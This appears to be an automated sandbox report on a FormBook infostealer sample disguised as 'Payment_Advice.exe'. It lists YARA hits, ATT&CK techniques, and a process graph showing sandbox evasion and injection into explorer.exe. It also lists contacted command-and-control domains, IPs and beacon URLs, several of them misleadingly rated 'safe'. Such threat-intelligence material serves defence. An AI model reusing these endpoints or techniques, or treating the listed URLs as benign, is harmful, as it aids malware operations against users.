          Source: Yara matchFile source: 00000010.00000002.3842416015.0000000002B50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.3842825880.0000000002F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000003.1581247037.000000000103D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.1647692265.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: ewdbwwfpdh.bmpBinary or memory string: WIN_81
          Source: ewdbwwfpdh.bmpBinary or memory string: WIN_XP
          Source: ewdbwwfpdh.bmp.0.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
          Source: ewdbwwfpdh.bmpBinary or memory string: WIN_XPe
          Source: ewdbwwfpdh.bmpBinary or memory string: WIN_VISTA
          Source: ewdbwwfpdh.bmpBinary or memory string: WIN_7
          Source: ewdbwwfpdh.bmpBinary or memory string: WIN_8

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 14.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000010.00000002.3843232274.0000000003390000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000003.1581336819.000000000106B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000003.1578728915.000000000106C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000003.1578835292.00000000010C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000003.1578787008.000000000109A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000003.1579705407.00000000010E2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000003.1580860266.000000000109A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.3842416015.0000000002B50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.3842825880.0000000002F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000003.1581247037.000000000103D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.1647692265.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_001F2163 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,6_2_001F2163
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_001F1B61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,6_2_001F1B61

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          2
          Valid Accounts          		1
          Scripting          		1
          DLL Side-Loading          		1
          Exploitation for Privilege Escalation          		1
          Disable or Modify Tools          		1
          Credential API Hooking          		2
          System Time Discovery          		Remote Services1
          Archive Collected Data          		Exfiltration Over Other Network Medium4
          Ingress Tool Transfer          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
          System Shutdown/Reboot
          Default Accounts1
          Native API          		2
          Valid Accounts          		1
          DLL Side-Loading          		1
          Deobfuscate/Decode Files or Information          		21
          Input Capture          		1
          Account Discovery          		Remote Desktop Protocol1
          Credential API Hooking          		Exfiltration Over Bluetooth1
          Encrypted Channel          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain Accounts1
          Shared Modules          		Logon Script (Windows)2
          Valid Accounts          		1
          Scripting          		Security Account Manager2
          File and Directory Discovery          		SMB/Windows Admin Shares21
          Input Capture          		Automated Exfiltration3
          Non-Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local Accounts2
          Command and Scripting Interpreter          		Logon Script (Mac)21
          Access Token Manipulation          		3
          Obfuscated Files or Information          		NTDS127
          System Information Discovery          		Distributed Component Object Model12
          Clipboard Data          		Scheduled Transfer13
          Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon Script912
          Process Injection          		1
          Software Packing          		LSA Secrets461
          Security Software Discovery          		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common1
          DLL Side-Loading          		Cached Domain Credentials12
          Virtualization/Sandbox Evasion          		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items1
          Rootkit          		DCSync3
          Process Discovery          		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
          Masquerading          		Proc Filesystem11
          Application Window Discovery          		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)2
          Valid Accounts          		/etc/passwd and /etc/shadow1
          System Owner/User Discovery          		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
          Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)12
          Virtualization/Sandbox Evasion          		Network Sniffing1
          System Network Configuration Discovery          		Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
          Compromise Software Dependencies and Development ToolsWindows Command ShellCronCron21
          Access Token Manipulation          		Input CapturePermission Groups DiscoveryReplication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
          Compromise Software Supply ChainUnix ShellLaunchdLaunchd912
          Process Injection          		KeyloggingLocal GroupsComponent Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1320960 Sample: Payment_Advice.exe Startdate: 06/10/2023 Architecture: WINDOWS Score: 100 53 www.usbulletinnow.com 2->53 55 www.tygyro.com 2->55 57 10 other IPs or domains 2->57 67 Snort IDS alert for network traffic 2->67 69 Found malware configuration 2->69 71 Malicious sample detected (through community Yara rule) 2->71 73 6 other signatures 2->73 14 Payment_Advice.exe 3 38 2->14         started        signatures3 process4 file5 51 C:\Users\user\AppData\...\ewdbwwfpdh.bmp, PE32 14->51 dropped 103 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 14->103 18 wscript.exe 2 1 14->18         started        signatures6 process7 signatures8 65 Windows Scripting host queries suspicious COM object (likely to drop second stage) 18->65 21 cmd.exe 1 18->21         started        24 cmd.exe 1 18->24         started        process9 signatures10 85 Uses ipconfig to lookup or modify the Windows network settings 21->85 87 Tries to detect virtualization through RDTSC time measurements 21->87 26 ewdbwwfpdh.bmp 2 21->26         started        29 conhost.exe 21->29         started        31 conhost.exe 24->31         started        33 ipconfig.exe 1 24->33         started        process11 signatures12 91 Multi AV Scanner detection for dropped file 26->91 93 Found API chain indicative of sandbox detection 26->93 95 Contains functionality to inject code into remote processes 26->95 97 5 other signatures 26->97 35 RegSvcs.exe 26->35         started        38 RegSvcs.exe 26->38         started        process13 signatures14 75 Modifies the context of a thread in another process (thread injection) 35->75 77 Maps a DLL or memory area into another process 35->77 79 Sample uses process hollowing technique 35->79 81 Queues an APC in another process (thread injection) 35->81 40 explorer.exe 10 1 35->40 injected 83 Tries to detect virtualization through RDTSC time measurements 38->83 process15 dnsIp16 59 www.tygyro.com 103.224.182.242, 49720, 80 TRELLIAN-AS-APTrellianPtyLimitedAU Australia 40->59 61 www.othersidewear.com 77.222.40.147, 49711, 80 SWEB-ASRU Russian Federation 40->61 63 6 other IPs or domains 40->63 89 System process connects to network (likely due to code injection or exploit) 40->89 44 cmd.exe 40->44         started        signatures17 process18 signatures19 99 Modifies the context of a thread in another process (thread injection) 44->99 101 Maps a DLL or memory area into another process 44->101 47 cmd.exe 1 44->47         started        process20 process21 49 conhost.exe 47->49         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Payment_Advice.exe45%ReversingLabsWin32.Trojan.Nymeria
          Payment_Advice.exe49%VirustotalBrowse

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmp13%ReversingLabs

          Unpacked PE Files

          No Antivirus matches

          Domains

          SourceDetectionScannerLabelLink
          www.91fulizifen.com0%VirustotalBrowse
          www.tygyro.com0%VirustotalBrowse
          www.brownkrosshui.com0%VirustotalBrowse
          www.usbulletinnow.com0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://schemas.micro0%URL Reputationsafe
          http://www.91fulizifen.com/hesf/www.pendletonofficial.shop0%Avira URL Cloudsafe
          http://www.usbulletinnow.comReferer:0%Avira URL Cloudsafe
          http://www.usbulletinnow.com0%Avira URL Cloudsafe
          http://www.usbulletinnow.com/hesf/0%Avira URL Cloudsafe
          http://www.usbulletinnow.com0%VirustotalBrowse
          http://www.usbulletinnow.com/hesf/0%VirustotalBrowse
          http://www.schistdisc.com/hesf/www.1320detailingsupplies.com0%Avira URL Cloudsafe
          http://www.im-newbie-journal.online0%Avira URL Cloudsafe
          http://www.im-newbie-journal.online/hesf/www.tygyro.com0%Avira URL Cloudsafe
          https://powerpoint.office.comer0%Avira URL Cloudsafe
          http://www.pendletonofficial.shopReferer:0%Avira URL Cloudsafe
          http://www.shayun.net/hesf/www.brownkrosshui.com0%Avira URL Cloudsafe
          http://www.pendletonofficial.shop/hesf/www.shayun.net0%Avira URL Cloudsafe
          http://www.homespy.net/hesf/0%Avira URL Cloudsafe
          http://www.jf66899j.com/hesf/www.jimenezfarmersinsurance.shop0%Avira URL Cloudsafe
          http://www.othersidewear.com/hesf/www.91fulizifen.com0%Avira URL Cloudsafe
          http://www.brownkrosshui.com/hesf/?jBZ=Zexu6rzcFbxF4r/yRE1P6uhuDniKqQl2K3Z2GVMnXCfVfpJX9615KGPJ2pRkkggZfWm9&Gvw=T4RpitPpFtBLx0%Avira URL Cloudsafe
          http://www.homespy.net/hesf/1%VirustotalBrowse
          http://www.jimenezfarmersinsurance.shop/hesf/0%Avira URL Cloudsafe
          http://www.microsoft.c0%Avira URL Cloudsafe
          http://www.tygyro.com/hesf/?jBZ=C6m+T/QSDYRxkia6wo2b10sg9WxaAAR9Ewn+rwYRRUW3VljC+LgrolCw9oI9hSyVjjh+&Gvw=T4RpitPpFtBLx0%Avira URL Cloudsafe
          http://www.im-newbie-journal.online/hesf/0%Avira URL Cloudsafe
          http://www.svgco.lifeReferer:0%Avira URL Cloudsafe
          http://www.1320detailingsupplies.com0%Avira URL Cloudsafe
          http://www.brownkrosshui.comReferer:0%Avira URL Cloudsafe
          http://www.jimenezfarmersinsurance.shopReferer:0%Avira URL Cloudsafe
          http://www.1320detailingsupplies.com/hesf/0%Avira URL Cloudsafe
          http://www.jimenezfarmersinsurance.shop/hesf/1%VirustotalBrowse
          http://www.pendletonofficial.shop/hesf/0%Avira URL Cloudsafe
          http://www.othersidewear.comReferer:0%Avira URL Cloudsafe
          http://www.tygyro.com/hesf/www.87b52.club0%Avira URL Cloudsafe
          http://www.87b52.club0%Avira URL Cloudsafe
          http://www.87b52.clubReferer:0%Avira URL Cloudsafe
          http://www.pendletonofficial.shop0%Avira URL Cloudsafe
          http://www.othersidewear.com/hesf/?jBZ=szcn2kpEQ6L2Syu9mG2pKozAyrZLMpz3ThmLak2r9KpoKfLz6EjH9XrJVzpw+e6nWP1B&Gvw=T4RpitPpFtBLx0%Avira URL Cloudsafe
          http://www.pancakesandwaflesbeverages.netReferer:0%Avira URL Cloudsafe
          http://www.schistdisc.comReferer:0%Avira URL Cloudsafe
          http://www.87b52.club/hesf/0%Avira URL Cloudsafe
          http://www.homespy.netReferer:0%Avira URL Cloudsafe
          http://www.jf66899j.comReferer:0%Avira URL Cloudsafe
          http://www.1320detailingsupplies.comReferer:0%Avira URL Cloudsafe
          http://www.brownkrosshui.com0%Avira URL Cloudsafe
          http://www.schistdisc.com/hesf/0%Avira URL Cloudsafe
          http://www.jf66899j.com0%Avira URL Cloudsafe
          http://www.schistdisc.com0%Avira URL Cloudsafe
          http://www.im-newbie-journal.onlineReferer:0%Avira URL Cloudsafe
          http://www.jf66899j.com/hesf/0%Avira URL Cloudsafe
          http://www.shayun.net/hesf/?jBZ=rBBm79yWj/0scTu35nBTjefHB3yHFR/9uN8IXoi0DRbgMbd2cnMvsZYXFupsHQ3mqy7J&Gvw=T4RpitPpFtBLx0%Avira URL Cloudsafe
          http://www.91fulizifen.com0%Avira URL Cloudsafe
          http://www.brownkrosshui.com/hesf/0%Avira URL Cloudsafe
          http://www.brownkrosshui.com/hesf/www.usbulletinnow.com0%Avira URL Cloudsafe
          http://www.87b52.club/hesf/?jBZ=Yl+PPX/Fw39a2JSf74vYq4wd93NvWGX3Wu4/ealva/bJOpk7yrAe/vXYfNyLtgAB6gnO&Gvw=T4RpitPpFtBLx0%Avira URL Cloudsafe
          http://www.1320detailingsupplies.com/hesf/www.jf66899j.com0%Avira URL Cloudsafe
          http://www.svgco.life0%Avira URL Cloudsafe
          http://www.tygyro.com/hesf/0%Avira URL Cloudsafe
          http://www.tygyro.comReferer:0%Avira URL Cloudsafe
          http://www.svgco.life/hesf/0%Avira URL Cloudsafe
          http://www.jimenezfarmersinsurance.shop0%Avira URL Cloudsafe
          http://www.pancakesandwaflesbeverages.net/hesf/www.schistdisc.com0%Avira URL Cloudsafe
          http://www.svgco.life/hesf/www.pancakesandwaflesbeverages.net0%Avira URL Cloudsafe
          http://www.91fulizifen.com/hesf/?jBZ=d2AGz1H3YsI9kghQJOJ7DZyuiCPgqoB+sSxuqf6m27exoGivXrHz5sUA11+t0RjRixK2&Gvw=T4RpitPpFtBLx0%Avira URL Cloudsafe
          www.jimenezfarmersinsurance.shop/hesf/0%Avira URL Cloudsafe
          http://www.91fulizifen.comReferer:0%Avira URL Cloudsafe
          http://ns.adobeS0%Avira URL Cloudsafe
          http://www.pancakesandwaflesbeverages.net/hesf/0%Avira URL Cloudsafe
          http://www.91fulizifen.com/hesf/0%Avira URL Cloudsafe
          http://www.87b52.club/hesf/www.svgco.life0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.91fulizifen.com
          		142.234.186.98
          		truetrueunknown
          parkingpage.namecheap.com
          		91.195.240.19
          		truefalse
            		high
            www.othersidewear.com
            		77.222.40.147
            		truetrue
              		unknown
              overdue.aliyun.com
              		170.33.13.246
              		truefalse
                		high
                usbulletinnow.com
                		62.72.50.244
                		truetrue
                  		unknown
                  www.im-newbie-journal.online
                  		66.96.160.140
                  		truetrue
                    		unknown
                    www.tygyro.com
                    		103.224.182.242
                    		truetrueunknown
                    www.87b52.club
                    		75.2.115.196
                    		truetrue
                      		unknown
                      www.brownkrosshui.com
                      		unknown
                      		unknowntrueunknown
                      www.pendletonofficial.shop
                      		unknown
                      		unknowntrue
                        		unknown
                        www.usbulletinnow.com
                        		unknown
                        		unknowntrueunknown
                        www.shayun.net
                        		unknown
                        		unknowntrue
                          		unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          http://www.brownkrosshui.com/hesf/?jBZ=Zexu6rzcFbxF4r/yRE1P6uhuDniKqQl2K3Z2GVMnXCfVfpJX9615KGPJ2pRkkggZfWm9&Gvw=T4RpitPpFtBLxtrue
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.tygyro.com/hesf/?jBZ=C6m+T/QSDYRxkia6wo2b10sg9WxaAAR9Ewn+rwYRRUW3VljC+LgrolCw9oI9hSyVjjh+&Gvw=T4RpitPpFtBLxtrue
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.othersidewear.com/hesf/?jBZ=szcn2kpEQ6L2Syu9mG2pKozAyrZLMpz3ThmLak2r9KpoKfLz6EjH9XrJVzpw+e6nWP1B&Gvw=T4RpitPpFtBLxtrue
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.shayun.net/hesf/?jBZ=rBBm79yWj/0scTu35nBTjefHB3yHFR/9uN8IXoi0DRbgMbd2cnMvsZYXFupsHQ3mqy7J&Gvw=T4RpitPpFtBLxtrue
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.87b52.club/hesf/?jBZ=Yl+PPX/Fw39a2JSf74vYq4wd93NvWGX3Wu4/ealva/bJOpk7yrAe/vXYfNyLtgAB6gnO&Gvw=T4RpitPpFtBLxtrue
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.91fulizifen.com/hesf/?jBZ=d2AGz1H3YsI9kghQJOJ7DZyuiCPgqoB+sSxuqf6m27exoGivXrHz5sUA11+t0RjRixK2&Gvw=T4RpitPpFtBLxtrue
                          • Avira URL Cloud: safe
                          		unknown
                          www.jimenezfarmersinsurance.shop/hesf/true
                          • Avira URL Cloud: safe
                          		low

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://powerpoint.office.comerexplorer.exe, 0000000F.00000002.3864604244.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1596839591.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.91fulizifen.com/hesf/www.pendletonofficial.shopexplorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.usbulletinnow.comReferer:explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://android.notify.windows.com/iOSA4explorer.exe, 0000000F.00000003.2285903553.000000000BCB4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3864604244.000000000BCB7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077912790.000000000BCB7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3078591847.000000000BCBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2286640369.000000000BCBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1596839591.000000000BC80000.00000004.00000001.00020000.00000000.sdmpfalse
                            		high
                            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                              		high
                              http://www.usbulletinnow.com/hesf/explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpfalse
                              • 0%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.usbulletinnow.comexplorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpfalse
                              • 0%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              		unknown
                              https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-worldexplorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                		high
                                https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 0000000F.00000003.2284163967.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1592153566.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3856158250.00000000091FB000.00000004.00000001.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.im-newbie-journal.onlineexplorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.schistdisc.com/hesf/www.1320detailingsupplies.comexplorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.im-newbie-journal.online/hesf/www.tygyro.comexplorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://excel.office.comexplorer.exe, 0000000F.00000002.3864604244.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1596839591.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpfalse
                                    		high
                                    https://www.msn.com/en-us/money/personalfinance/the-big-3-mistakes-financial-advisors-say-that-the-1explorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.shayun.net/hesf/www.brownkrosshui.comexplorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://www.autoitscript.com/autoit3/Payment_Advice.exe, 00000000.00000003.1414188164.000000000789D000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp.0.drfalse
                                        		high
                                        http://www.pendletonofficial.shopReferer:explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
